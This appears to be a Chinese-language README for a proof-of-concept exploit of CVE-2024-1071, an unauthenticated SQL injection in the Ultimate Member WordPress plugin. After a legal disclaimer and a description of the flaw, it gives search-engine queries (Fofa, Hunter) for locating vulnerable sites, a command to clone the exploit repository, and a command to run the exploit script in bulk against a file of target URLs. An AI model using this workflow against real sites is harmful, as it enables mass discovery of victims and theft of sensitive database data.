免责声明:本概念验证(POC)仅用于教育和道德测试目的。未经事先双方同意使用此工具攻击目标是违法的。最终用户有责任遵守所有适用的地方、州和联邦法律。开发者不承担任何责任,并且不对因使用本程序而导致的任何误用或损害负责。
Ultimate Member – 用户个人资料、注册、登录、成员目录、内容限制和会员插件的 WordPress 插件在 2.1.3 至 2.8.2 版本中,由于对用户提供的 'sorting' 参数转义不足以及对现有 SQL 查询缺乏充分准备,存在 SQL 注入漏洞。这使得未经身份验证的攻击者可以将额外的 SQL 查询附加到现有查询中,从而用于从数据库中提取敏感信息。

要寻找潜在目标,请使用 Fofa(类似于 Shodan.io):
body="/wp-content/plugins/ultimate-member"Hunter: body="/wp-content/plugins/ultimate-member"首先,克隆仓库:
- git clone https://github.com/fa-rrel/CVE-2024-1071-SQL-Injection.git
- cd CVE-2024-1071-SQL-Injection
接下来选择目标并将其添加到 urls.txt 文件中,格式如下:
运行漏洞利用工具:
python3 CVE-2024-1071.py -f urls.txt